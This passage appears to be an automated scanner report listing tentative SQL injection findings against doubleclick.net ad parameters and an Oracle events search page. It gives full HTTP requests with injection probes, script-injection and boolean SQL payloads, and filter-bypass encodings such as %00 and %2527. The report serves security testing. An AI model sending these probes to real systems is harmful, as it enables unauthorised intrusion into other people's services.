<td width="60">&nbsp;</td>
<td colspan="2" align="left" valign="top" width="100%">
<table border="0" width="400" summary="resultDetail5">
<tbody>
<tr>
<td colspan="5" width="100%" style="padding-bottom: 10px;" align="left">
<strong>
<a onclick="window.open('http://www.oracle.com/go/?&amp;Src=6963067&amp;Act=31&amp;pcode=LADPN10014049MPP035','Headlines_Result','height=480,width=640,resizable=yes,location=yes,scrollbars=yes,status=yes,toolbar=yes,menubar=yes,addressbar=yes');return false;" href="http://www.oracle.com/go/?&amp;Src=6963067&amp;Act=31&amp;pcode=LADPN10014049MPP035"><b>OPN</b> Hyperion Planning 11.1.1 Implementation Boot Camp Ed 1 (D64290GC10) - Oracle
</a>
</strong>




<div style="padding-top: 7px; font-size: 11px; display: none; padding-right: 10px;" id="table_5"><wbr>

                A Boot Camp on Hyperion Planning 11.1.1 Implementation for partners in S..o Paulo. Save the date and join us!
<br><br>In Progress until March 18<br>
    </div>
</td>

</tr>
<tr>

<td style="width: 5em; cursor: pointer; font-weight: bold; color: red; padding-top: 15px; p
...[SNIP]...

Request 2

GET /search/search?group=Events&keyword=OPN+Only&9f0e2%22-alert(document.cookie&1%20and%201%3d2--%20=1 HTTP/1.1
Host: events.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.1 (M;max-age=900+0;age=0;ecid=167737601348,0)
Date: Fri, 18 Mar 2011 15:37:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 177053


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-e
...[SNIP]...
<i>Rio De Janeiro</i> </td>
</tr>
</tbody>
</table></td>
<td width="60">&nbsp;</td>
<td colspan="2" align="left" valign="top" width="100%">
<table border="0" width="400" summary="resultDetail5">
<tbody>
<tr>
<td colspan="5" width="100%" style="padding-bottom: 10px;" align="left">
<strong>
<a onclick="window.open('http://www.oracle.com/go/?&amp;Src=6963067&amp;Act=36&amp;pcode=LADPN10014049MPP040','Headlines_Result','height=480,width=640,resizable=yes,location=yes,scrollbars=yes,status=yes,toolbar=yes,menubar=yes,addressbar=yes');return false;" href="http://www.oracle.com/go/?&amp;Src=6963067&amp;Act=36&amp;pcode=LADPN10014049MPP040"><b>OPN</b> R12.1 Oracle SCM Essentials Implementation Boot Camp Ed 1 (D64622GC10) - Oracle
</a>
</strong>




<div style="padding-top: 7px; font-size: 11px; display: none; padding-right: 10px;" id="table_5"><wbr>

                A Boot Camp ofnOPN R12.1 Oracle SCM Essentials Implementation taking place in Rio de Janeiro. Save the date and join us!
<br><br>In Progress until March 26<br>
    </div>
</td>

</tr>
<tr>

<td style="width: 5em; cursor: pointer; font-weight: bold; color: red; p
...[SNIP]...
1.11. http://googleads.g.doubleclick.net/pagead/ads [flash parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The flash parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the flash parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154%00'&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:09:11 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 11422
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
c?c:"http://csi.gstatic.com/csi","?v=3","&s="+(d[f].sn||"pagead")+"&action=",a.name,m.length?"&it="+m.join(","):"","",g,"&rt=",p.join(",")].join("");b=new Image;var r=d[f].c++;d[f].a[r]=b;b.onload=b.onerror=function(){delete d[f].a[r]};b.src=a;b=null;return a}};var l=d[f].load;function o(a,b){var c=parseInt(a,10);if(c>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154%00''&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:09:13 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4434
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
1.12. http://googleads.g.doubleclick.net/pagead/ads [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The h parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the h parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60%2527&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:05:59 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4436
X-XSS-Protection: 1; mode=block

<html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={Timer:a,load:g}
...[SNIP]...
"?v=3","&s="+(window.jstiming.sn||"pagead")+"&action=",b.name,j.length?"&it="+j.join(","):"","",f,"&rt=",m.join(",")].join("");a=new Image;var o=window.jstiming.c++;window.jstiming.a[o]=a;a.onload=a.onerror=function(){delete window.jstiming.a[o]};a.src=b;a=null;return b}};var i=window.jstiming.load;function l(b,a){var e=parseInt(b,10);if(e>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60%2527%2527&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:06:00 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4432
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
1.13. http://googleads.g.doubleclick.net/pagead/ads [id cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb%2527; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 25-Mar-2011 17:35:04 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:20:04 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 6446
X-XSS-Protection: 1; mode=block
Expires: Fri, 25 Mar 2011 17:20:04 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
c?c:"http://csi.gstatic.com/csi","?v=3","&s="+(d[f].sn||"pagead")+"&action=",a.name,m.length?"&it="+m.join(","):"","",g,"&rt=",p.join(",")].join("");b=new Image;var r=d[f].c++;d[f].a[r]=b;b.onload=b.onerror=function(){delete d[f].a[r]};b.src=a;b=null;return a}};var l=d[f].load;function o(a,b){var c=parseInt(a,10);if(c>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb%2527%2527; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 25-Mar-2011 17:35:05 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:20:05 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 9636
X-XSS-Protection: 1; mode=block
Expires: Fri, 25 Mar 2011 17:20:05 GMT

<style>body{margin:0;padding:0}</style><div id="google_flash_inline_div" style="position:relative;z-index:1001;width:468px"><div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><
...[SNIP]...
1.14. http://googleads.g.doubleclick.net/pagead/ads [output parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The output parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the output parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html%2527&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:05:49 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 11320
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
c?c:"http://csi.gstatic.com/csi","?v=3","&s="+(d[f].sn||"pagead")+"&action=",a.name,m.length?"&it="+m.join(","):"","",g,"&rt=",p.join(",")].join("");b=new Image;var r=d[f].c++;d[f].a[r]=b;b.onload=b.onerror=function(){delete d[f].a[r]};b.src=a;b=null;return a}};var l=d[f].load;function o(a,b){var c=parseInt(a,10);if(c>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html%2527%2527&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:05:50 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4436
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
1.15. http://googleads.g.doubleclick.net/pagead/ads [shv parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The shv parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the shv parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315'&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:11:04 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 11209
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
c?c:"http://csi.gstatic.com/csi","?v=3","&s="+(d[f].sn||"pagead")+"&action=",a.name,m.length?"&it="+m.join(","):"","",g,"&rt=",p.join(",")].join("");b=new Image;var r=d[f].c++;d[f].a[r]=b;b.onload=b.onerror=function(){delete d[f].a[r]};b.src=a;b=null;return a}};var l=d[f].load;function o(a,b){var c=parseInt(a,10);if(c>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315''&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:11:05 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4486
X-XSS-Protection: 1; mode=block

<html><head><style><!--
